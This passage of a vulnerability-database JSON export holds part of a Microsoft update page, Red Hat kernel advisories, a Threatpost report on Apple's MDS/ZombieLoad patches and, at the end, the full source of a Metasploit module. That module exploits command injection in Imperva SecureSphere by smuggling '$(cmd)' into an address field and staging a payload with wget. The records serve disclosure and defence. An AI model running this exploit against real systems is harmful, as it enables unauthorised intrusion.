improvements.\u00a0 Key changes include:</p><ul><li>Enables \u201cRetpoline\u201d by default if Spectre Variant 2 (<a data-content-id=\"\" data-content-type=\"\" href=\"https://portal.msrc.microsoft.com/{lang-locale}/security-guidance/advisory/adv180002\" managed-link=\"\" target=\"_blank\">CVE-2017-5715</a>) is enabled. Make sure previous OS protections against the Spectre Variant 2 vulnerability are enabled using the registry settings described in the\u00a0<a data-content-id=\"\" data-content-type=\"\" href=\"https://support.microsoft.com/{lang-locale}/help/4073119/protect-against-speculative-execution-side-channel-vulnerabilities-in\" managed-link=\"\" target=\"_blank\">Windows Client</a> and <a data-content-id=\"\" data-content-type=\"\" href=\"https://support.microsoft.com/{lang-locale}/help/4072698/windows-server-speculative-execution-side-channel-vulnerabilities-prot\" managed-link=\"\" target=\"_blank\">Windows Server</a>\u00a0articles. (<span><span>These registry settings are enabled by default for Windows Client OS editions, but disabled by default for Windows Server OS editions).</span></span> <span><span>For more information about \u201cRetpoline\u201d,</span></span> <span><span>see</span></span> <a data-content-id=\"\" data-content-type=\"\" href=\"https://techcommunity.microsoft.com/t5/Windows-Kernel-Internals/Mitigating-Spectre-variant-2-with-Retpoline-on-Windows/ba-p/295618\" managed-link=\"\" target=\"_blank\">Mitigating Spectre variant 2 with Retpoline on Windows</a>.</li><li>Provides protections against a new subclass of speculative execution side-channel vulnerabilities, known as <em>Microarchitectural Data Sampling</em>, for 64-Bit (x64) versions of Windows (<a data-content-id=\"\" data-content-type=\"\" href=\"https://portal.msrc.microsoft.com/{lang-locale}/security-guidance/advisory/adv190013\" managed-link=\"\" target=\"_blank\">CVE-2019-11091</a>,<a data-content-id=\"\" data-content-type=\"\" 
href=\"https://portal.msrc.microsoft.com/{lang-locale}/security-guidance/advisory/adv190013\" managed-link=\"\" target=\"_blank\"> CVE-2018-12126</a>, <a data-content-id=\"\" data-content-type=\"\" href=\"https://portal.msrc.microsoft.com/{lang-locale}/security-guidance/advisory/adv190013\" managed-link=\"\" target=\"_blank\">CVE-2018-12127</a>, <a data-content-id=\"\" data-content-type=\"\" href=\"https://portal.msrc.microsoft.com/{lang-locale}/security-guidance/advisory/adv190013\" managed-link=\"\" target=\"_blank\">CVE-2018-12130</a>). Use the registry settings as described in the\u00a0<a data-content-id=\"\" data-content-type=\"\" href=\"https://support.microsoft.com/{lang-locale}/help/4073119/protect-against-speculative-execution-side-channel-vulnerabilities-in\" managed-link=\"\" target=\"_blank\">Windows Client</a> and <a data-content-id=\"\" data-content-type=\"\" href=\"https://support.microsoft.com/{lang-locale}/help/4072698/windows-server-speculative-execution-side-channel-vulnerabilities-prot\" managed-link=\"\" target=\"_blank\">Windows Server</a>\u00a0articles<em>. 
</em>(<span><span>These registry settings are enabled by default for Windows Client OS editions and Windows Server OS editions).</span></span></li><li>Adds \"gov.uk\" to the HTTP Strict Transport Security Top Level Domains (HSTS TLD) for Internet Explorer and Microsoft Edge.</li><li>Addresses an issue that may cause \u201cError 1309\u201d while installing or uninstalling certain types of .msi and .msp files on a virtual drive.</li><li>Addresses an issue that prevents the Microsoft Visual Studio Simulator from starting.</li><li>Addresses an issue that may cause zone transfers between primary and secondary DNS servers over the Transmission Control Protocol (TCP) to fail.</li><li><span><span>Addresses an issue that causes Simple Network Management Protocol (SNMP) Management Information Base registration to fail when the Windows Management Instrumentation (WMI) provider uses the Windows tool <strong>SMI2SMIR.exe</strong></span></span><strong>.</strong></li><li>Addresses an issue that may cause the text, layout, or cell size to become narrower or wider than expected in Microsoft Excel when using the <strong>MS UI Gothic </strong>or <strong>MS PGothic </strong>fonts.\u00a0</li><li>Security updates to Microsoft Edge, Internet Explorer, Microsoft Scripting Engine, Windows App Platform and Frameworks, Windows Graphics, Windows Storage and Filesystems, Windows Cryptography, the Microsoft JET Database Engine, Windows Kernel, Windows Virtualization, and Windows Server .</li></ul><p>If you installed earlier updates, only the new fixes contained in this package will be downloaded and installed on your device.</p><p><span><span><span><span>For more information about the resolved security vulnerabilities, please refer to the </span></span></span></span><span><span><span><a data-content-id=\"\" data-content-type=\"\" href=\"https://portal.msrc.microsoft.com/security-guidance\" managed-link=\"\" target=\"_blank\">Security Update Guide</a>.</span></span></span></p><div 
class=\"alert-band\"><div class=\"alert alert-info\" role=\"alert\"><p class=\"alert-title\">Windows Update Improvements</p><div class=\"row\"><div class=\"col-xs-24\"><p>Microsoft has released an update directly to the Windows Update client to improve reliability. Any device running Windows 10 configured to receive updates automatically from Windows Update, including Enterprise and Pro editions, will be offered the latest Windows 10 feature update based on device compatibility and Windows Update for Business deferral policy. This doesn't apply to long-term servicing editions.</p></div></div></div></div></div><h2>Known issues in this update</h2><div><table class=\"table\"><tbody><tr><td>Symptom</td><td>Workaround</td></tr><tr><td>After installing this update, there may be issues using the Preboot Execution Environment (PXE) to start a device from a Windows Deployment Services (WDS) server configured to use Variable Window Extension. This may cause the connection to the WDS server to terminate prematurely while downloading the image. This issue does not affect clients or devices that are not using Variable Window Extension.</td><td><p>This issue is resolved in <a data-content-id=\"4503327\" data-content-type=\"article\" href=\"\" managed-link=\"\" target=\"_blank\">KB4503327</a>.</p></td></tr><tr><td>Certain operations, such as <strong>rename</strong>, that you perform on files or folders that are on a Cluster Shared Volume (CSV) may fail with the error, \u201cSTATUS_BAD_IMPERSONATION_LEVEL (0xC00000A5)\u201d. 
This occurs when you perform the operation on a CSV owner node from a process that doesn\u2019t have administrator privilege.</td><td><p>Do one of the following:</p><ul><li>Perform the operation from a process that has administrator privilege.</li><li>Perform the operation from a node that doesn\u2019t have CSV ownership.</li></ul>Microsoft is working on a resolution and will provide an update in an upcoming release.</td></tr><tr><td>When attempting to print from Microsoft Edge or other Universal Windows Platform (UWP) applications, you may receive the error, \"Your printer has experienced an unexpected configuration problem. 0x80070007e.\"</td><td><p>This issue is resolved in <a data-content-id=\"4501371\" data-content-type=\"article\" href=\"\" managed-link=\"\" target=\"_blank\">KB4501371</a>.</p></td></tr><tr><td>After installing <a data-content-id=\"4493509\" data-content-type=\"article\" href=\"\" managed-link=\"\" target=\"_blank\">KB4493509</a>, devices with some Asian language packs installed may receive the error, \"0x800f0982 - PSFX_E_MATCHING_COMPONENT_NOT_FOUND.\"</td><td><ol><li>Uninstall and reinstall any recently added language packs. For instructions, see <a data-content-id=\"4496404\" data-content-type=\"article\" href=\"\" managed-link=\"\">Manage the input and display language settings in Windows 10</a>.</li><li>Select\u00a0<strong>Check for Updates</strong> and install the April 2019 Cumulative Update. 
For instructions, see <a data-content-id=\"4027667\" data-content-type=\"ia\" href=\"\" managed-link=\"\">Update Windows 10</a>.</li></ol><p class=\"indent-2\"><strong>Note</strong> If reinstalling the language pack does not mitigate the issue, reset your PC as follows:</p><ol><li class=\"indent-2\">Go to the <strong>Settings </strong>app > <strong>Recovery</strong>.</li><li class=\"indent-2\">Select <strong>Get Started</strong> under the <strong>Reset this PC</strong> recovery option.</li><li class=\"indent-2\">Select <strong>Keep my Files</strong>.</li></ol><p>Microsoft is working on a resolution and will provide an update in an upcoming release.</p></td></tr><tr><td><p>Some customers report\u00a0that KB4494441 installed twice on their device.<strong><span><span><span>\u00a0</span></span></span></strong></p><p><span><span><span>In certain situations, installing an update requires multiple download and restart steps. If two intermediate steps of the installation complete successfully, the <strong>View your Update history</strong> page will report that installation completed successfully twice. </span></span></span></p></td><td><p><span><span><span>No action is required on your part. The update installation may take longer and may require more than one restart, but will install successfully after all intermediate installation steps have completed. 
</span></span></span></p><p><span><span><span>We are working on improving this update experience to ensure the <strong>Update history</strong> correctly reflects the installation of the latest cumulative update (LCU).</span></span></span></p></td></tr><tr><td>After installing the May 14, 2019 update, some gov.uk websites that don\u2019t support HTTP Strict Transport Security (HSTS) may not be accessible through Internet Explorer 11 or Microsoft Edge.</td><td>This issue is resolved in <a data-content-id=\"4505056\" data-content-type=\"article\" href=\"\" managed-link=\"\" target=\"_blank\">KB4505056</a>.</td></tr></tbody></table></div><h2>How to get this update</h2><div><p><strong>Before installing this update</strong></p><p><strong>Prerequisite: </strong>The servicing stack update (SSU) (<a data-content-id=\"4499728\" data-content-type=\"article\" href=\"\" managed-link=\"\" target=\"_blank\">KB4499728</a>) must be installed before installing the latest cumulative update (LCU). The\u00a0LCU will not be reported as applicable until the SSU is installed.\u00a0For more information, see\u00a0<a aria-live=\"assertive\" data-bi-name=\"content-anchor-link\" data-content-id=\"\" data-content-type=\"\" href=\"https://docs.microsoft.com/windows/deployment/update/servicing-stack-updates#why-should-servicing-stack-updates-be-installed-and-kept-up-to-date\" managed-link=\"\" tabindex=\"0\" target=\"_blank\">Servicing stack updates</a>.</p><p>If you are using Windows Update, the latest SSU (<a data-content-id=\"4499728\" data-content-type=\"article\" href=\"\" managed-link=\"\" target=\"_blank\">KB4499728</a>) will be offered to you automatically. 
To get the standalone package for the latest SSU, search for it in the <a data-content-id=\"\" data-content-type=\"\" href=\"http://www.catalog.update.microsoft.com/home.aspx\" managed-link=\"\" target=\"_blank\">Microsoft Update Catalog</a>.</p><p><strong>Install this update</strong></p><p>This update will be downloaded and installed automatically from Windows Update. To get the standalone package for this update, go to the\u00a0<a data-content-id=\"\" data-content-type=\"\" href=\"http://catalog.update.microsoft.com/v7/site/Search.aspx?q=KB4494441\" managed-link=\"\" target=\"_blank\">Microsoft Update Catalog</a>\u00a0website.</p><p><strong>File information</strong></p><p>For a list of the files that are provided in this update, download the\u00a0<a data-content-id=\"\" data-content-type=\"\" href=\"http://download.microsoft.com/download/A/2/C/A2CB22DA-EEEF-49E5-9F1F-674AFD365436/4494441.csv\" managed-link=\"\" target=\"_blank\">file information for cumulative update 4494441</a>.\u00a0</p></div></body></html>", "modified": "2019-06-19T18:48:54", "id": "KB4494441", "href": "https://support.microsoft.com/en-us/help/4494441/", "published": "2019-06-19T18:48:38", "title": "May 14, 2019\u2014KB4494441 (OS Build 17763.503)", "type": "mskb", "cvss": {"score": 4.7, "vector": "AV:L/AC:M/Au:N/C:C/I:N/A:N"}}], "redhat": [{"lastseen": "2019-08-13T18:45:05", "bulletinFamily": "unix", "description": "The kernel-rt packages provide the Real Time Linux Kernel, which enables fine-tuning for systems with extremely high determinism requirements.\n\nSecurity Fix(es):\n\n* A flaw was found in the implementation of the \"fill buffer\", a mechanism used by modern CPUs when a cache-miss is made on L1 CPU cache. If an attacker can generate a load operation that would create a page fault, the execution will continue speculatively with incorrect data from the fill buffer while the data is fetched from higher level caches. This response time can be measured to infer data in the fill buffer. 
(CVE-2018-12130)\n\n* Modern Intel microprocessors implement hardware-level micro-optimizations to improve the performance of writing data back to CPU caches. The write operation is split into STA (STore Address) and STD (STore Data) sub-operations. These sub-operations allow the processor to hand-off address generation logic into these sub-operations for optimized writes. Both of these sub-operations write to a shared distributed processor structure called the 'processor store buffer'. As a result, an unprivileged attacker could use this flaw to read private data resident within the CPU's processor store buffer. (CVE-2018-12126)\n\n* Microprocessors use a \u2018load port\u2019 subcomponent to perform load operations from memory or IO. During a load operation, the load port receives data from the memory or IO subsystem and then provides the data to the CPU registers and operations in the CPU\u2019s pipelines. Stale load operations results are stored in the 'load port' table until overwritten by newer operations. Certain load-port operations triggered by an attacker can be used to reveal data about previous stale requests leaking data back to the attacker via a timing side-channel. (CVE-2018-12127)\n\n* Uncacheable memory on some microprocessors utilizing speculative execution may allow an authenticated user to potentially enable information disclosure via a side channel with local access. 
(CVE-2019-11091)\n\n* kernel: Buffer overflow in firewire driver via crafted incoming packets (CVE-2016-8633)\n\n* kernel: crypto: privilege escalation in skcipher_recvmsg function (CVE-2017-13215)\n\n* Kernel: ipsec: xfrm: use-after-free leading to potential privilege escalation (CVE-2017-16939)\n\n* kernel: Out-of-bounds write via userland offsets in ebt_entry struct in netfilter/ebtables.c (CVE-2018-1068)\n\n* kernel: Use-after-free due to race condition in AF_PACKET implementation (CVE-2018-18559)\n\n* kernel: media: use-after-free in [tuner-xc2028] media driver (CVE-2016-7913)\n\n* kernel: Out-of-bounds access via an XFRM_MSG_MIGRATE xfrm Netlink message (CVE-2017-11600)\n\n* kernel: memory leak when merging buffers in SCSI IO vectors (CVE-2017-12190)\n\n* kernel: Unallocated memory access by malicious USB device via bNumInterfaces overflow (CVE-2017-17558)\n\n* Kernel: FPU state information leakage via lazy FPU restore (CVE-2018-3665)\n\nFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.\n\nBug Fix(es):\n\n* update the MRG 2.5.z 3.10 kernel-rt sources (BZ#1692711)", "modified": "2019-05-15T00:21:15", "published": "2019-05-15T00:16:01", "id": "RHSA-2019:1190", "href": "https://access.redhat.com/errata/RHSA-2019:1190", "type": "redhat", "title": "(RHSA-2019:1190) Important: kernel-rt security and bug fix update", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-08-13T18:46:39", "bulletinFamily": "unix", "description": "The kernel packages contain the Linux kernel, the core of any Linux operating system.\n\nSecurity Fix(es):\n\n* A flaw was found in the implementation of the \"fill buffer\", a mechanism used by modern CPUs when a cache-miss is made on L1 CPU cache. 
If an attacker can generate a load operation that would create a page fault, the execution will continue speculatively with incorrect data from the fill buffer while the data is fetched from higher level caches. This response time can be measured to infer data in the fill buffer. (CVE-2018-12130)\n\n* Modern Intel microprocessors implement hardware-level micro-optimizations to improve the performance of writing data back to CPU caches. The write operation is split into STA (STore Address) and STD (STore Data) sub-operations. These sub-operations allow the processor to hand-off address generation logic into these sub-operations for optimized writes. Both of these sub-operations write to a shared distributed processor structure called the 'processor store buffer'. As a result, an unprivileged attacker could use this flaw to read private data resident within the CPU's processor store buffer. (CVE-2018-12126)\n\n* Microprocessors use a \u2018load port\u2019 subcomponent to perform load operations from memory or IO. During a load operation, the load port receives data from the memory or IO subsystem and then provides the data to the CPU registers and operations in the CPU\u2019s pipelines. Stale load operations results are stored in the 'load port' table until overwritten by newer operations. Certain load-port operations triggered by an attacker can be used to reveal data about previous stale requests leaking data back to the attacker via a timing side-channel. (CVE-2018-12127)\n\n* Uncacheable memory on some microprocessors utilizing speculative execution may allow an authenticated user to potentially enable information disclosure via a side channel with local access. 
(CVE-2019-11091)\n\n* kernel: Buffer overflow in firewire driver via crafted incoming packets (CVE-2016-8633)\n\n* kernel: crypto: privilege escalation in skcipher_recvmsg function (CVE-2017-13215)\n\n* Kernel: ipsec: xfrm: use-after-free leading to potential privilege escalation (CVE-2017-16939)\n\n* kernel: Out-of-bounds write via userland offsets in ebt_entry struct in netfilter/ebtables.c (CVE-2018-1068)\n\n* kernel: Use-after-free due to race condition in AF_PACKET implementation (CVE-2018-18559)\n\n* kernel: media: use-after-free in [tuner-xc2028] media driver (CVE-2016-7913)\n\n* kernel: Out-of-bounds access via an XFRM_MSG_MIGRATE xfrm Netlink message (CVE-2017-11600)\n\n* kernel: memory leak when merging buffers in SCSI IO vectors (CVE-2017-12190)\n\n* kernel: Unallocated memory access by malicious USB device via bNumInterfaces overflow (CVE-2017-17558)\n\n* Kernel: KVM: DoS via write flood to I/O port 0x80 (CVE-2017-1000407)\n\n* Kernel: FPU state information leakage via lazy FPU restore (CVE-2018-3665)\n\nFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.\n\nBug Fix(es):\n\n* rwsem in inconsistent state leading system to hung (BZ#1690321)\n\n* efi_bgrt_init fails to ioremap error during boot (BZ#1692284)", "modified": "2019-05-14T22:49:05", "published": "2019-05-14T22:09:09", "id": "RHSA-2019:1170", "href": "https://access.redhat.com/errata/RHSA-2019:1170", "type": "redhat", "title": "(RHSA-2019:1170) Important: kernel security and bug fix update", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "threatpost": [{"lastseen": "2019-12-06T07:13:36", "bulletinFamily": "info", "description": "Apple has rolled out 173 patches for various products across its hardware portfolio, including fixes for dangerous bugs in macOS for laptops and desktops, iPhone, Apple TV and Apple Watch.\n\nThe update also includes a 
patch for the side-channel vulnerabilities in Intel chips [disclosed on Tuesday](<https://threatpost.com/intel-cpus-impacted-by-new-class-of-spectre-like-attacks/144728/>), which open the door to the attack vectors collectively dubbed \u201cZombieLoad.\u201d\n\nAll Mac laptops stretching back to 2011 are affected by the Intel flaws.\n\n## Side-Channel Flaw\n\nOf particular note in the massive update is a patch for four side-channel bugs that affect the microcode of macOS Mojave 10.14.4 (CVE-2018-12126, CVE-2018-12127, CVE-2018-12130 and CVE-2019-11091).\n\nThese impact load ports, fill buffers, and store buffers in systems with microprocessors utilizing speculative execution. They stem from side-channel vulnerabilities, dubbed Microarchitectural Data Sampling (MDS), impacting all modern Intel chips. Attackers could use speculative execution to potentially leak sensitive data from a system\u2019s CPU.\n\n[](<https://threatpost.com/newsletter-sign/>)\n\n\u201c[The flaws may allow] an attacker with local user access to potentially enable information disclosure via a side channel,\u201d according to the [Apple advisory](<https://support.apple.com/en-us/HT210119>). 
\u201cMultiple information-disclosure issues were addressed partially by updating the microcode and changing the OS scheduler to isolate the system from web content running in the browser.\u201d\n\nThe [four different attack vectors](<https://cpu.fail/>) are dubbed ZombieLoad, Fallout, RIDL (Rogue In-Flight Data Load) and Store-to-Leak Forwarding, and have been detailed and publicly disclosed on Tuesday by an array of security researchers.\n\nTo completely address these issues, there are additional [opt-in mitigations](<https://support.apple.com/kb/HT210107>) to disable hyper threading and enable microcode-based mitigations for all processes by default.\n\n## iOS 12.3 Update (42 Fixes)\n\nApple has also rolled out a [cornucopia of patches](<https://support.apple.com/en-us/HT210118>) for iPhone 5s and later, the iPad Air and later, and the sixth-generation iPod touch.\n\nThe most severe are bugs that are also present in the Apple Watch. These include flaws in the kernel (CVE-2019-8605) that would allow a malicious application to execute arbitrary code with system privileges on a target device. It\u2019s a use-after-free issue that was addressed with improved memory management.\n\nAnother shared flaw with Apple Watch is a use-after-free issue in the Mail Message Framework (CVE-2019-8613), which would allow a remote attacker to cause arbitrary code execution. And in MobileLockdown, a malicious application may be able to gain root privileges thanks to an input validation issue (CVE-2019-8637).\n\nYet another flaw shared with Apple Watch (CVE-2019-8620) would allow a device to be passively tracked by its Wi-Fi MAC address.\n\nAside from these, also interesting is a Lock Screen logic problem (CVE-2019-8599) that would allow a person with physical access to an iOS device to see the email address used for iTunes.\n\nAn input validation bug (CVE-2019-8626) in the Mail function meanwhile could lead to denial of service. 
An attacker could exploit this by sending the target victim a maliciously crafted mail message.\n\nOther patches address vulnerabilities that could be exploited to achieve everything from privilege escalation and escaping sandboxes to overwriting files and information disclosure.\n\n## Safari 12.1.1 Update (21 Fixes)\n\nApple also patched [multiple flaws](<https://support.apple.com/en-us/HT210123>) in the operating systems that power its Macbooks and desktops: macOS Sierra 10.12.6, macOS High Sierra 10.13.6 and macOS Mojave 10.14.5 are vulnerable. All of the bugs are in WebKit, and they can all be exploited via processing maliciously crafted web content.\n\nOne flaw is an out-of-bounds read vulnerability (CVE-2019-8607); and there are also 20 different memory-corruption issues that may lead to arbitrary code-execution. Apple didn\u2019t provide further details.\n\n## tvOS 12.3 Update (35 Fixes)\n\nThe Apple TV 4K and Apple TV HD platforms meanwhile are [riddled with vulnerabilities;](<https://support.apple.com/en-us/HT210120>) 35 of them in all.\n\nMost of them are memory corruption issues (a total of 20) that could allow arbitrary code-execution via maliciously crafted web content.\n\nAnother two memory bugs (in AppleFileConduit, CVE-2019-8593 and in sysdiagnose, CVE-2019-8574) could allow an application to execute arbitrary code with system privileges.\n\nThree bugs were patched in the kernel: A use-after-free issue (CVE-2019-8605) that could lead to arbitrary code-execution with system privileges; an out-of-bounds read (CVE-2019-8576) that could allow a local user to cause unexpected system termination or read kernel memory; and a type confusion issue (CVE-2019-8591) that could allow an application to cause unexpected system termination or write kernel memory.\n\nAlso notable is an out-of-bounds read that could lead to arbitrary code execution in CoreAudio (CVE-2019-8585); and in MobileLockdown, a malicious application may be able to gain root privileges thanks 
to an input validation issue (CVE-2019-8637).\n\n## watchOS 5.2.1 Update (21 Fixes)\n\nApple Watch Series 1 and later has [a slew of issues](<https://support.apple.com/en-us/HT210122>), many shared with non-updated versions of iOS.\n\nThe most severe of the bunch include a memory corruption issue CVE-2019-8593 in the AppleFileConduit component that could allow an application to execute arbitrary code with system privileges; and an out-of-bounds read bug (CVE-2019-8585) in CoreAudio allowing a maliciously crafted movie file to lead to arbitrary code execution.\n\nThere are also three vulnerabilities in the kernel: A use-after-free issue (CVE-2019-8605) that would allow a malicious application to execute arbitrary code with system privileges (also fixed in iOS); an out-of-bounds read (CVE-2019-8576) that would allow a local user to cause unexpected system termination or read the kernel memory; and a type confusion issue (CVE-2019-8591) that would allow a malicious application to cause unexpected system termination or write kernel memory.\n\nWatch also suffers from the same use-after-free bug in the Mail Message Framework (CVE-2019-8613) that allows remote code-execution; this is also fixed in the iOS update.\n\nAnd, also fixed is the user-privacy issue present in iOS (CVE-2019-8620) that would allow a device to be passively tracked by its Wi-Fi MAC address.\n\n## Apple TV Software 7.3 Update (3 Fixes)\n\nAnd finally, the third-generation Apple TV has [three vulnerabilities](<https://support.apple.com/en-us/HT210121>), existing in both the Bluetooth and Wi-Fi functions.\n\nAn input validation issue in Bluetooth (CVE-2017-14315) could allow a remote attacker to cause an unexpected application termination or arbitrary code execution. 
And as for Wi-Fi, an attacker within range may be able to execute arbitrary code on the Wi-Fi chip via a memory corruption problem (CVE-2017-9417), or via a stack buffer overflow (CVE-2017-6975).\n\n## Other Fixes\n\nApple also fixed [50 additional vulnerabilities](<https://support.apple.com/en-us/HT210119>) in macOS Mojave 10.14.5; Security Update 2019-003 High Sierra; Security Update 2019-003 Sierra; macOS Sierra 10.12.6; macOS High Sierra 10.13.6; and macOS Mojave 10.14.4.\n\n**_Want to know more about Identity Management and navigating the shift beyond passwords? Don\u2019t miss _**[**_our Threatpost webinar on May 29 at 2 p.m. ET_**](<https://attendee.gotowebinar.com/register/8039101655437489665?source=ART>)**_. Join Threatpost editor Tom Spring and a panel of experts as they discuss how cloud, mobility and digital transformation are accelerating the adoption of new Identity Management solutions. Experts discuss the impact of millions of new digital devices (and things) requesting access to managed networks and the challenges that follow._**\n", "modified": "2019-05-14T21:31:36", "published": "2019-05-14T21:31:36", "id": "THREATPOST:CBFAA2319AF4281EC1DD5C4682601942", "href": "https://threatpost.com/apple-patches-intel-side-channel-ios-macos/144743/", "type": "threatpost", "title": "Apple Patches Intel Side-Channel Bugs; Updates iOS, macOS and More", "cvss": {"score": 7.9, "vector": "AV:A/AC:M/Au:N/C:C/I:C/A:C"}}], "metasploit": [{"lastseen": "2019-11-26T16:28:27", "bulletinFamily": "exploit", "description": "This module exploits a command injection vulnerability in Imperva SecureSphere 13.x. The vulnerability exists in the PWS service, where Python CGIs didn't properly sanitize user-supplied command parameters and passed them directly to the corresponding CLI utility, leading to command injection. An agent registration credential is required to exploit SecureSphere in gateway mode. 
This module was successfully tested on Imperva SecureSphere 13.0/13.1/ 13.2 in pre-ftl mode and unsealed gateway mode.\n", "modified": "2019-03-06T03:57:42", "published": "2019-01-08T06:18:04", "id": "MSF:EXPLOIT/LINUX/HTTP/IMPERVA_SECURESPHERE_EXEC", "href": "", "type": "metasploit", "title": "Imperva SecureSphere PWS Command Injection", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::CmdStager\n\n def initialize(info = {})\n super(\n update_info(\n info,\n 'Name' => 'Imperva SecureSphere PWS Command Injection',\n 'Description' => %q(\n This module exploits a command injection vulnerability in Imperva\n SecureSphere 13.x. The vulnerability exists in the PWS service,\n where Python CGIs didn't properly sanitize user supplied command\n parameters and directly passes them to corresponding CLI utility,\n leading to command injection. 
Agent registration credential is\n required to exploit SecureSphere in gateway mode.\n\n This module was successfully tested on Imperva SecureSphere 13.0/13.1/\n 13.2 in pre-ftl mode and unsealed gateway mode.\n ),\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'rsp3ar <lukunming<at>gmail.com>' # Discovery/Metasploit Module\n ],\n 'References' =>\n [\n [ 'EDB', '45542' ]\n ],\n 'DisclosureDate' => \"Oct 8 2018\",\n 'DefaultOptions' => {\n 'SSL' => true,\n 'PrependFork' => true,\n },\n 'Platform' => 'linux',\n 'Arch' => [ARCH_X86, ARCH_X64],\n 'CmdStagerFlavor' => %w{ echo printf wget },\n 'Targets' =>\n [\n ['Imperva SecureSphere 13.0/13.1/13.2', {}]\n ],\n 'DefaultTarget' => 0))\n\n register_options(\n [\n Opt::RPORT(443),\n OptString.new('USERNAME', [false, 'Agent registration username', 'imperva']),\n OptString.new('PASSWORD', [false, 'Agent registration password', '']),\n OptString.new('TARGETURI', [false, 'The URI path to impcli', '/pws/impcli']),\n OptInt.new('TIMEOUT', [false, 'HTTP connection timeout', 15])\n ])\n register_advanced_options [\n OptBool.new('ForceExploit', [false, 'Override check result', false])\n ]\n end\n\n def check\n begin\n res = execute_command('id')\n rescue => e\n vprint_error(\"#{e}\")\n return CheckCode::Unknown\n end\n\n if res.body =~ /uid=\\d+/\n return CheckCode::Vulnerable\n end\n\n CheckCode::Safe\n end\n\n def exploit\n unless CheckCode::Vulnerable == check\n unless datastore['ForceExploit']\n fail_with(Failure::NotVulnerable, 'Target is not vulnerable. 
Set ForceExploit to override.')\n end\n print_warning 'Target does not appear to be vulnerable'\n end\n\n print_status(\"Sending payload #{datastore['PAYLOAD']}\")\n execute_cmdstager\n end\n\n def execute_command(cmd, opts = {})\n data = {\n 'command' => 'impctl server status',\n 'parameters' => {\n 'broadcast' => true,\n 'installer-address' => \"127.0.0.1 $(#{cmd})\"\n }\n }\n\n res = send_request data\n\n return unless res\n\n if res.code == 401\n fail_with(Failure::NoAccess, 'Authorization Failure, valid agent registration credential is required')\n end\n\n unless res.code == 406 && res.body.include?(\"impctl\")\n fail_with(Failure::Unknown, 'Server did not respond in an expected way')\n end\n\n res\n end\n\n def send_request(data)\n req_params = {\n 'method' => 'POST',\n 'uri' => normalize_uri(target_uri.path),\n 'data' => data.to_json\n }\n\n if !datastore['USERNAME'].blank? && !datastore['PASSWORD'].blank?\n unless @cookie\n res = send_request_cgi({\n 'method' => 'GET',\n 'uri' => normalize_uri('/')\n })\n unless res\n fail_with(Failure::Unreachable, \"#{peer} - Connection failed\")\n end\n\n @cookie = res.get_cookies\n end\n\n req_params['cookie'] = @cookie\n req_params['headers'] = {\n 'Authorization' => basic_auth(datastore['USERNAME'], datastore['PASSWORD'])\n }\n end\n\n send_request_cgi(req_params, datastore['TIMEOUT'])\n end\nend\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/linux/http/imperva_securesphere_exec.rb"}]}